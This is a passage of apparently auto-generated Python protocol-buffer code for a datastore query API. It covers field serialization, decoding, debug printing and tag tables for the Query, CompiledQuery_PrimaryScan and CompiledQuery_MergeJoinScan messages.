    if (self.has_compile_):
      out.putVarInt32(200)
      out.putBoolean(self.compile_)
    if (self.has_failover_ms_):
      out.putVarInt32(208)
      out.putVarInt64(self.failover_ms_)
    if (self.has_name_space_):
      out.putVarInt32(234)
      out.putPrefixedString(self.name_space_)
    if (self.has_compiled_cursor_):
      out.putVarInt32(242)
      out.putVarInt32(self.compiled_cursor_.ByteSize())
      self.compiled_cursor_.OutputUnchecked(out)
    if (self.has_end_compiled_cursor_):
      out.putVarInt32(250)
      out.putVarInt32(self.end_compiled_cursor_.ByteSize())
      self.end_compiled_cursor_.OutputUnchecked(out)
    if (self.has_strong_):
      out.putVarInt32(256)
      out.putBoolean(self.strong_)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(266)
      out.putPrefixedString(self.property_name_[i])
    for i in xrange(len(self.group_by_property_name_)):
      out.putVarInt32(274)
      out.putPrefixedString(self.group_by_property_name_[i])
    if (self.has_min_safe_time_seconds_):
      out.putVarInt32(280)
      out.putVarInt64(self.min_safe_time_seconds_)
    for i in xrange(len(self.safe_replica_name_)):
      out.putVarInt32(290)
      out.putPrefixedString(self.safe_replica_name_[i])
    if (self.has_persist_offset_):
      out.putVarInt32(296)
      out.putBoolean(self.persist_offset_)
    if (self.has_header_):
      out.putVarInt32(314)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Like OutputUnchecked, but writes each field (including the required
    # 'app') only when present, and sizes sub-messages with ByteSizePartial.
    if (self.has_app_):
      out.putVarInt32(10)
      out.putPrefixedString(self.app_)
    if (self.has_kind_):
      out.putVarInt32(26)
      out.putPrefixedString(self.kind_)
    for i in xrange(len(self.filter_)):
      out.putVarInt32(35)
      self.filter_[i].OutputPartial(out)
      out.putVarInt32(36)
    if (self.has_search_query_):
      out.putVarInt32(66)
      out.putPrefixedString(self.search_query_)
    for i in xrange(len(self.order_)):
      out.putVarInt32(75)
      self.order_[i].OutputPartial(out)
      out.putVarInt32(76)
    if (self.has_offset_):
      out.putVarInt32(96)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(128)
      out.putVarInt32(self.limit_)
    if (self.has_ancestor_):
      out.putVarInt32(138)
      out.putVarInt32(self.ancestor_.ByteSizePartial())
      self.ancestor_.OutputPartial(out)
    if (self.has_hint_):
      out.putVarInt32(144)
      out.putVarInt32(self.hint_)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(154)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)
    if (self.has_require_perfect_plan_):
      out.putVarInt32(160)
      out.putBoolean(self.require_perfect_plan_)
    if (self.has_keys_only_):
      out.putVarInt32(168)
      out.putBoolean(self.keys_only_)
    if (self.has_transaction_):
      out.putVarInt32(178)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    if (self.has_count_):
      out.putVarInt32(184)
      out.putVarInt32(self.count_)
    if (self.has_distinct_):
      out.putVarInt32(192)
      out.putBoolean(self.distinct_)
    if (self.has_compile_):
      out.putVarInt32(200)
      out.putBoolean(self.compile_)
    if (self.has_failover_ms_):
      out.putVarInt32(208)
      out.putVarInt64(self.failover_ms_)
    if (self.has_name_space_):
      out.putVarInt32(234)
      out.putPrefixedString(self.name_space_)
    if (self.has_compiled_cursor_):
      out.putVarInt32(242)
      out.putVarInt32(self.compiled_cursor_.ByteSizePartial())
      self.compiled_cursor_.OutputPartial(out)
    if (self.has_end_compiled_cursor_):
      out.putVarInt32(250)
      out.putVarInt32(self.end_compiled_cursor_.ByteSizePartial())
      self.end_compiled_cursor_.OutputPartial(out)
    if (self.has_strong_):
      out.putVarInt32(256)
      out.putBoolean(self.strong_)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(266)
      out.putPrefixedString(self.property_name_[i])
    for i in xrange(len(self.group_by_property_name_)):
      out.putVarInt32(274)
      out.putPrefixedString(self.group_by_property_name_[i])
    if (self.has_min_safe_time_seconds_):
      out.putVarInt32(280)
      out.putVarInt64(self.min_safe_time_seconds_)
    for i in xrange(len(self.safe_replica_name_)):
      out.putVarInt32(290)
      out.putPrefixedString(self.safe_replica_name_[i])
    if (self.has_persist_offset_):
      out.putVarInt32(296)
      out.putBoolean(self.persist_offset_)
    if (self.has_header_):
      out.putVarInt32(314)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode fields from decoder 'd' until it is exhausted, dispatching on
    # each wire tag.  Length-delimited sub-messages are parsed through a
    # bounded sub-decoder; unknown tags are skipped, tag 0 is a decode error.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        self.set_app(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_kind(d.getPrefixedString())
        continue
      if tt == 35:
        self.add_filter().TryMerge(d)
        continue
      if tt == 66:
        self.set_search_query(d.getPrefixedString())
        continue
      if tt == 75:
        self.add_order().TryMerge(d)
        continue
      if tt == 96:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 128:
        self.set_limit(d.getVarInt32())
        continue
      if tt == 138:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_ancestor().TryMerge(tmp)
        continue
      if tt == 144:
        self.set_hint(d.getVarInt32())
        continue
      if tt == 154:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue
      if tt == 160:
        self.set_require_perfect_plan(d.getBoolean())
        continue
      if tt == 168:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 178:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 184:
        self.set_count(d.getVarInt32())
        continue
      if tt == 192:
        self.set_distinct(d.getBoolean())
        continue
      if tt == 200:
        self.set_compile(d.getBoolean())
        continue
      if tt == 208:
        self.set_failover_ms(d.getVarInt64())
        continue
      if tt == 234:
        self.set_name_space(d.getPrefixedString())
        continue
      if tt == 242:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 250:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_end_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 256:
        self.set_strong(d.getBoolean())
        continue
      if tt == 266:
        self.add_property_name(d.getPrefixedString())
        continue
      if tt == 274:
        self.add_group_by_property_name(d.getPrefixedString())
        continue
      if tt == 280:
        self.set_min_safe_time_seconds(d.getVarInt64())
        continue
      if tt == 290:
        self.add_safe_replica_name(d.getPrefixedString())
        continue
      if tt == 296:
        self.set_persist_offset(d.getBoolean())
        continue
      if tt == 314:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render this message as human-readable, indented debug text.

    prefix: string prepended to every emitted line; nested submessages are
      rendered with two extra spaces of indentation.
    printElemNumber: when true, each element of a repeated field is
      annotated with its index, e.g. "Filter(0) {".
    Only fields whose has_*/repeated state is set are printed.
    """
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    if self.has_name_space_: res+=prefix+("name_space: %s\n" % self.DebugFormatString(self.name_space_))
    if self.has_kind_: res+=prefix+("kind: %s\n" % self.DebugFormatString(self.kind_))
    if self.has_ancestor_:
      res+=prefix+"ancestor <\n"
      res+=self.ancestor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.filter_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Filter%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_search_query_: res+=prefix+("search_query: %s\n" % self.DebugFormatString(self.search_query_))
    cnt=0
    for e in self.order_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("Order%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_hint_: res+=prefix+("hint: %s\n" % self.DebugFormatInt32(self.hint_))
    if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
    if self.has_compiled_cursor_:
      res+=prefix+"compiled_cursor <\n"
      res+=self.compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_end_compiled_cursor_:
      res+=prefix+"end_compiled_cursor <\n"
      res+=self.end_compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_require_perfect_plan_: res+=prefix+("require_perfect_plan: %s\n" % self.DebugFormatBool(self.require_perfect_plan_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_compile_: res+=prefix+("compile: %s\n" % self.DebugFormatBool(self.compile_))
    if self.has_failover_ms_: res+=prefix+("failover_ms: %s\n" % self.DebugFormatInt64(self.failover_ms_))
    if self.has_strong_: res+=prefix+("strong: %s\n" % self.DebugFormatBool(self.strong_))
    cnt=0
    for e in self.property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    cnt=0
    for e in self.group_by_property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("group_by_property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_distinct_: res+=prefix+("distinct: %s\n" % self.DebugFormatBool(self.distinct_))
    if self.has_min_safe_time_seconds_: res+=prefix+("min_safe_time_seconds: %s\n" % self.DebugFormatInt64(self.min_safe_time_seconds_))
    cnt=0
    for e in self.safe_replica_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("safe_replica_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_persist_offset_: res+=prefix+("persist_offset: %s\n" % self.DebugFormatBool(self.persist_offset_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    """Densify a {tag: value} mapping into a tuple indexed 0..maxtag.

    Tags absent from `sparse` map to `default`.  Invoked at
    class-definition time to build the _TEXT and _TYPES tables below.
    """
    table = []
    for tag in xrange(maxtag + 1):
      table.append(sparse.get(tag, default))
    return tuple(table)

  # Proto field numbers for Query's fields; names prefixed with the group
  # name (e.g. kFilterop) belong to fields nested inside a group.
  kheader = 39
  kapp = 1
  kname_space = 29
  kkind = 3
  kancestor = 17
  kFilterGroup = 4
  kFilterop = 6
  kFilterproperty = 14
  ksearch_query = 8
  kOrderGroup = 9
  kOrderproperty = 10
  kOrderdirection = 11
  khint = 18
  kcount = 23
  koffset = 12
  klimit = 16
  kcompiled_cursor = 30
  kend_compiled_cursor = 31
  kcomposite_index = 19
  krequire_perfect_plan = 20
  kkeys_only = 21
  ktransaction = 22
  kcompile = 25
  kfailover_ms = 26
  kstrong = 32
  kproperty_name = 33
  kgroup_by_property_name = 34
  kdistinct = 24
  kmin_safe_time_seconds = 35
  ksafe_replica_name = 36
  kpersist_offset = 37

  # Dense field-number -> field-name table (debug/text output).
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "app",
    3: "kind",
    4: "Filter",
    6: "op",
    8: "search_query",
    9: "Order",
    10: "property",
    11: "direction",
    12: "offset",
    14: "property",
    16: "limit",
    17: "ancestor",
    18: "hint",
    19: "composite_index",
    20: "require_perfect_plan",
    21: "keys_only",
    22: "transaction",
    23: "count",
    24: "distinct",
    25: "compile",
    26: "failover_ms",
    29: "name_space",
    30: "compiled_cursor",
    31: "end_compiled_cursor",
    32: "strong",
    33: "property_name",
    34: "group_by_property_name",
    35: "min_safe_time_seconds",
    36: "safe_replica_name",
    37: "persist_offset",
    39: "header",
  }, 39)

  # Dense field-number -> wire-type table; unknown slots fall back to
  # MAX_TYPE.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.STARTGROUP,
    6: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.STARTGROUP,
    10: ProtocolBuffer.Encoder.STRING,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.NUMERIC,
    14: ProtocolBuffer.Encoder.STRING,
    16: ProtocolBuffer.Encoder.NUMERIC,
    17: ProtocolBuffer.Encoder.STRING,
    18: ProtocolBuffer.Encoder.NUMERIC,
    19: ProtocolBuffer.Encoder.STRING,
    20: ProtocolBuffer.Encoder.NUMERIC,
    21: ProtocolBuffer.Encoder.NUMERIC,
    22: ProtocolBuffer.Encoder.STRING,
    23: ProtocolBuffer.Encoder.NUMERIC,
    24: ProtocolBuffer.Encoder.NUMERIC,
    25: ProtocolBuffer.Encoder.NUMERIC,
    26: ProtocolBuffer.Encoder.NUMERIC,
    29: ProtocolBuffer.Encoder.STRING,
    30: ProtocolBuffer.Encoder.STRING,
    31: ProtocolBuffer.Encoder.STRING,
    32: ProtocolBuffer.Encoder.NUMERIC,
    33: ProtocolBuffer.Encoder.STRING,
    34: ProtocolBuffer.Encoder.STRING,
    35: ProtocolBuffer.Encoder.NUMERIC,
    36: ProtocolBuffer.Encoder.STRING,
    37: ProtocolBuffer.Encoder.NUMERIC,
    39: ProtocolBuffer.Encoder.STRING,
  }, 39, ProtocolBuffer.Encoder.MAX_TYPE)


  # Empty style/content-type hooks and the fully-qualified proto name.
  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Query'
class CompiledQuery_PrimaryScan(ProtocolBuffer.ProtocolMessage):
  """Generated message for the PrimaryScan group of CompiledQuery.

  Follows the standard generated-protobuf pattern: per-field has_* flags
  with class-level defaults, set_/clear_/has_ accessors for optional
  fields, list-backed accessors for repeated fields, and hand-rolled
  wire-format encode/decode (OutputUnchecked/TryMerge).  This message is
  encoded as a group, so TryMerge terminates on an END_GROUP tag rather
  than on buffer exhaustion.
  """

  # Class-level defaults; instances shadow these once a field is set.
  has_index_name_ = 0
  index_name_ = ""
  has_start_key_ = 0
  start_key_ = ""
  has_start_inclusive_ = 0
  start_inclusive_ = 0
  has_end_key_ = 0
  end_key_ = ""
  has_end_inclusive_ = 0
  end_inclusive_ = 0
  has_end_unapplied_log_timestamp_us_ = 0
  end_unapplied_log_timestamp_us_ = 0

  def __init__(self, contents=None):
    # Repeated fields need per-instance lists (class-level would be shared).
    self.start_postfix_value_ = []
    self.end_postfix_value_ = []
    if contents is not None: self.MergeFromString(contents)

  def index_name(self): return self.index_name_

  def set_index_name(self, x):
    self.has_index_name_ = 1
    self.index_name_ = x

  def clear_index_name(self):
    if self.has_index_name_:
      self.has_index_name_ = 0
      self.index_name_ = ""

  def has_index_name(self): return self.has_index_name_

  def start_key(self): return self.start_key_

  def set_start_key(self, x):
    self.has_start_key_ = 1
    self.start_key_ = x

  def clear_start_key(self):
    if self.has_start_key_:
      self.has_start_key_ = 0
      self.start_key_ = ""

  def has_start_key(self): return self.has_start_key_

  def start_inclusive(self): return self.start_inclusive_

  def set_start_inclusive(self, x):
    self.has_start_inclusive_ = 1
    self.start_inclusive_ = x

  def clear_start_inclusive(self):
    if self.has_start_inclusive_:
      self.has_start_inclusive_ = 0
      self.start_inclusive_ = 0

  def has_start_inclusive(self): return self.has_start_inclusive_

  def end_key(self): return self.end_key_

  def set_end_key(self, x):
    self.has_end_key_ = 1
    self.end_key_ = x

  def clear_end_key(self):
    if self.has_end_key_:
      self.has_end_key_ = 0
      self.end_key_ = ""

  def has_end_key(self): return self.has_end_key_

  def end_inclusive(self): return self.end_inclusive_

  def set_end_inclusive(self, x):
    self.has_end_inclusive_ = 1
    self.end_inclusive_ = x

  def clear_end_inclusive(self):
    if self.has_end_inclusive_:
      self.has_end_inclusive_ = 0
      self.end_inclusive_ = 0

  def has_end_inclusive(self): return self.has_end_inclusive_

  def start_postfix_value_size(self): return len(self.start_postfix_value_)
  def start_postfix_value_list(self): return self.start_postfix_value_

  def start_postfix_value(self, i):
    return self.start_postfix_value_[i]

  def set_start_postfix_value(self, i, x):
    self.start_postfix_value_[i] = x

  def add_start_postfix_value(self, x):
    self.start_postfix_value_.append(x)

  def clear_start_postfix_value(self):
    self.start_postfix_value_ = []

  def end_postfix_value_size(self): return len(self.end_postfix_value_)
  def end_postfix_value_list(self): return self.end_postfix_value_

  def end_postfix_value(self, i):
    return self.end_postfix_value_[i]

  def set_end_postfix_value(self, i, x):
    self.end_postfix_value_[i] = x

  def add_end_postfix_value(self, x):
    self.end_postfix_value_.append(x)

  def clear_end_postfix_value(self):
    self.end_postfix_value_ = []

  def end_unapplied_log_timestamp_us(self): return self.end_unapplied_log_timestamp_us_

  def set_end_unapplied_log_timestamp_us(self, x):
    self.has_end_unapplied_log_timestamp_us_ = 1
    self.end_unapplied_log_timestamp_us_ = x

  def clear_end_unapplied_log_timestamp_us(self):
    if self.has_end_unapplied_log_timestamp_us_:
      self.has_end_unapplied_log_timestamp_us_ = 0
      self.end_unapplied_log_timestamp_us_ = 0

  def has_end_unapplied_log_timestamp_us(self): return self.has_end_unapplied_log_timestamp_us_


  def MergeFrom(self, x):
    """Copy every set field of `x` into self; repeated fields are appended."""
    assert x is not self
    if (x.has_index_name()): self.set_index_name(x.index_name())
    if (x.has_start_key()): self.set_start_key(x.start_key())
    if (x.has_start_inclusive()): self.set_start_inclusive(x.start_inclusive())
    if (x.has_end_key()): self.set_end_key(x.end_key())
    if (x.has_end_inclusive()): self.set_end_inclusive(x.end_inclusive())
    for i in xrange(x.start_postfix_value_size()): self.add_start_postfix_value(x.start_postfix_value(i))
    for i in xrange(x.end_postfix_value_size()): self.add_end_postfix_value(x.end_postfix_value(i))
    if (x.has_end_unapplied_log_timestamp_us()): self.set_end_unapplied_log_timestamp_us(x.end_unapplied_log_timestamp_us())

  def Equals(self, x):
    """Field-by-field equality: presence flags and values must both match."""
    if x is self: return 1
    if self.has_index_name_ != x.has_index_name_: return 0
    if self.has_index_name_ and self.index_name_ != x.index_name_: return 0
    if self.has_start_key_ != x.has_start_key_: return 0
    if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
    if self.has_start_inclusive_ != x.has_start_inclusive_: return 0
    if self.has_start_inclusive_ and self.start_inclusive_ != x.start_inclusive_: return 0
    if self.has_end_key_ != x.has_end_key_: return 0
    if self.has_end_key_ and self.end_key_ != x.end_key_: return 0
    if self.has_end_inclusive_ != x.has_end_inclusive_: return 0
    if self.has_end_inclusive_ and self.end_inclusive_ != x.end_inclusive_: return 0
    if len(self.start_postfix_value_) != len(x.start_postfix_value_): return 0
    for e1, e2 in zip(self.start_postfix_value_, x.start_postfix_value_):
      if e1 != e2: return 0
    if len(self.end_postfix_value_) != len(x.end_postfix_value_): return 0
    for e1, e2 in zip(self.end_postfix_value_, x.end_postfix_value_):
      if e1 != e2: return 0
    if self.has_end_unapplied_log_timestamp_us_ != x.has_end_unapplied_log_timestamp_us_: return 0
    if self.has_end_unapplied_log_timestamp_us_ and self.end_unapplied_log_timestamp_us_ != x.end_unapplied_log_timestamp_us_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # All fields are optional, so any instance is initialized.
    initialized = 1
    return initialized

  def ByteSize(self):
    """Serialized size in bytes; constants are the per-field tag sizes."""
    n = 0
    if (self.has_index_name_): n += 1 + self.lengthString(len(self.index_name_))
    if (self.has_start_key_): n += 1 + self.lengthString(len(self.start_key_))
    if (self.has_start_inclusive_): n += 2
    if (self.has_end_key_): n += 1 + self.lengthString(len(self.end_key_))
    if (self.has_end_inclusive_): n += 2
    # Fields 22/23 have 2-byte tags (varints 178/186 exceed one byte).
    n += 2 * len(self.start_postfix_value_)
    for i in xrange(len(self.start_postfix_value_)): n += self.lengthString(len(self.start_postfix_value_[i]))
    n += 2 * len(self.end_postfix_value_)
    for i in xrange(len(self.end_postfix_value_)): n += self.lengthString(len(self.end_postfix_value_[i]))
    if (self.has_end_unapplied_log_timestamp_us_): n += 2 + self.lengthVarInt64(self.end_unapplied_log_timestamp_us_)
    return n

  def ByteSizePartial(self):
    # Identical to ByteSize here since no field is required.
    n = 0
    if (self.has_index_name_): n += 1 + self.lengthString(len(self.index_name_))
    if (self.has_start_key_): n += 1 + self.lengthString(len(self.start_key_))
    if (self.has_start_inclusive_): n += 2
    if (self.has_end_key_): n += 1 + self.lengthString(len(self.end_key_))
    if (self.has_end_inclusive_): n += 2
    n += 2 * len(self.start_postfix_value_)
    for i in xrange(len(self.start_postfix_value_)): n += self.lengthString(len(self.start_postfix_value_[i]))
    n += 2 * len(self.end_postfix_value_)
    for i in xrange(len(self.end_postfix_value_)): n += self.lengthString(len(self.end_postfix_value_[i]))
    if (self.has_end_unapplied_log_timestamp_us_): n += 2 + self.lengthVarInt64(self.end_unapplied_log_timestamp_us_)
    return n

  def Clear(self):
    self.clear_index_name()
    self.clear_start_key()
    self.clear_start_inclusive()
    self.clear_end_key()
    self.clear_end_inclusive()
    self.clear_start_postfix_value()
    self.clear_end_postfix_value()
    self.clear_end_unapplied_log_timestamp_us()

  def OutputUnchecked(self, out):
    """Serialize all set fields; tag constants are (field_num << 3) | type."""
    if (self.has_index_name_):
      out.putVarInt32(18)
      out.putPrefixedString(self.index_name_)
    if (self.has_start_key_):
      out.putVarInt32(26)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(32)
      out.putBoolean(self.start_inclusive_)
    if (self.has_end_key_):
      out.putVarInt32(42)
      out.putPrefixedString(self.end_key_)
    if (self.has_end_inclusive_):
      out.putVarInt32(48)
      out.putBoolean(self.end_inclusive_)
    if (self.has_end_unapplied_log_timestamp_us_):
      out.putVarInt32(152)
      out.putVarInt64(self.end_unapplied_log_timestamp_us_)
    for i in xrange(len(self.start_postfix_value_)):
      out.putVarInt32(178)
      out.putPrefixedString(self.start_postfix_value_[i])
    for i in xrange(len(self.end_postfix_value_)):
      out.putVarInt32(186)
      out.putPrefixedString(self.end_postfix_value_[i])

  def OutputPartial(self, out):
    # Same as OutputUnchecked: every field here is optional.
    if (self.has_index_name_):
      out.putVarInt32(18)
      out.putPrefixedString(self.index_name_)
    if (self.has_start_key_):
      out.putVarInt32(26)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(32)
      out.putBoolean(self.start_inclusive_)
    if (self.has_end_key_):
      out.putVarInt32(42)
      out.putPrefixedString(self.end_key_)
    if (self.has_end_inclusive_):
      out.putVarInt32(48)
      out.putBoolean(self.end_inclusive_)
    if (self.has_end_unapplied_log_timestamp_us_):
      out.putVarInt32(152)
      out.putVarInt64(self.end_unapplied_log_timestamp_us_)
    for i in xrange(len(self.start_postfix_value_)):
      out.putVarInt32(178)
      out.putPrefixedString(self.start_postfix_value_[i])
    for i in xrange(len(self.end_postfix_value_)):
      out.putVarInt32(186)
      out.putPrefixedString(self.end_postfix_value_[i])

  def TryMerge(self, d):
    """Decode fields from `d` until this group's END_GROUP tag (12)."""
    while 1:
      tt = d.getVarInt32()
      if tt == 12: break
      if tt == 18:
        self.set_index_name(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_start_key(d.getPrefixedString())
        continue
      if tt == 32:
        self.set_start_inclusive(d.getBoolean())
        continue
      if tt == 42:
        self.set_end_key(d.getPrefixedString())
        continue
      if tt == 48:
        self.set_end_inclusive(d.getBoolean())
        continue
      if tt == 152:
        self.set_end_unapplied_log_timestamp_us(d.getVarInt64())
        continue
      if tt == 178:
        self.add_start_postfix_value(d.getPrefixedString())
        continue
      if tt == 186:
        self.add_end_postfix_value(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render set fields as indented debug text (see Query.__str__)."""
    res=""
    if self.has_index_name_: res+=prefix+("index_name: %s\n" % self.DebugFormatString(self.index_name_))
    if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
    if self.has_start_inclusive_: res+=prefix+("start_inclusive: %s\n" % self.DebugFormatBool(self.start_inclusive_))
    if self.has_end_key_: res+=prefix+("end_key: %s\n" % self.DebugFormatString(self.end_key_))
    if self.has_end_inclusive_: res+=prefix+("end_inclusive: %s\n" % self.DebugFormatBool(self.end_inclusive_))
    cnt=0
    for e in self.start_postfix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("start_postfix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    cnt=0
    for e in self.end_postfix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("end_postfix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_end_unapplied_log_timestamp_us_: res+=prefix+("end_unapplied_log_timestamp_us: %s\n" % self.DebugFormatInt64(self.end_unapplied_log_timestamp_us_))
    return res

class CompiledQuery_MergeJoinScan(ProtocolBuffer.ProtocolMessage):
  """Generated message for the MergeJoinScan group of CompiledQuery.

  index_name is a required field (see IsInitialized); prefix_value is
  repeated and value_prefix is an optional bool.  Encoded as a group, so
  TryMerge terminates on an END_GROUP tag rather than buffer exhaustion.
  """

  # Class-level defaults; instances shadow these once a field is set.
  has_index_name_ = 0
  index_name_ = ""
  has_value_prefix_ = 0
  value_prefix_ = 0

  def __init__(self, contents=None):
    # Repeated field needs a per-instance list.
    self.prefix_value_ = []
    if contents is not None: self.MergeFromString(contents)

  def index_name(self): return self.index_name_

  def set_index_name(self, x):
    self.has_index_name_ = 1
    self.index_name_ = x

  def clear_index_name(self):
    if self.has_index_name_:
      self.has_index_name_ = 0
      self.index_name_ = ""

  def has_index_name(self): return self.has_index_name_

  def prefix_value_size(self): return len(self.prefix_value_)
  def prefix_value_list(self): return self.prefix_value_

  def prefix_value(self, i):
    return self.prefix_value_[i]

  def set_prefix_value(self, i, x):
    self.prefix_value_[i] = x

  def add_prefix_value(self, x):
    self.prefix_value_.append(x)

  def clear_prefix_value(self):
    self.prefix_value_ = []

  def value_prefix(self): return self.value_prefix_

  def set_value_prefix(self, x):
    self.has_value_prefix_ = 1
    self.value_prefix_ = x

  def clear_value_prefix(self):
    if self.has_value_prefix_:
      self.has_value_prefix_ = 0
      self.value_prefix_ = 0

  def has_value_prefix(self): return self.has_value_prefix_


  def MergeFrom(self, x):
    """Copy every set field of `x` into self; prefix_value is appended."""
    assert x is not self
    if (x.has_index_name()): self.set_index_name(x.index_name())
    for i in xrange(x.prefix_value_size()): self.add_prefix_value(x.prefix_value(i))
    if (x.has_value_prefix()): self.set_value_prefix(x.value_prefix())

  def Equals(self, x):
    """Field-by-field equality: presence flags and values must both match."""
    if x is self: return 1
    if self.has_index_name_ != x.has_index_name_: return 0
    if self.has_index_name_ and self.index_name_ != x.index_name_: return 0
    if len(self.prefix_value_) != len(x.prefix_value_): return 0
    for e1, e2 in zip(self.prefix_value_, x.prefix_value_):
      if e1 != e2: return 0
    if self.has_value_prefix_ != x.has_value_prefix_: return 0
    if self.has_value_prefix_ and self.value_prefix_ != x.value_prefix_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # index_name is required; report it when missing.
    initialized = 1
    if (not self.has_index_name_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: index_name not set.')
    return initialized

  def ByteSize(self):
    """Serialized size in bytes; the trailing +1 is index_name's tag byte."""
    n = 0
    n += self.lengthString(len(self.index_name_))
    n += 1 * len(self.prefix_value_)
    for i in xrange(len(self.prefix_value_)): n += self.lengthString(len(self.prefix_value_[i]))
    # value_prefix: 2-byte tag (varint 160) + 1 boolean byte.
    if (self.has_value_prefix_): n += 3
    return n + 1

  def ByteSizePartial(self):
    # Unlike ByteSize, counts index_name only when actually set.
    n = 0
    if (self.has_index_name_):
      n += 1
      n += self.lengthString(len(self.index_name_))
    n += 1 * len(self.prefix_value_)
    for i in xrange(len(self.prefix_value_)): n += self.lengthString(len(self.prefix_value_[i]))
    if (self.has_value_prefix_): n += 3
    return n

  def Clear(self):
    self.clear_index_name()
    self.clear_prefix_value()
    self.clear_value_prefix()

  def OutputUnchecked(self, out):
    """Serialize; index_name is written unconditionally (required field)."""
    out.putVarInt32(66)
    out.putPrefixedString(self.index_name_)
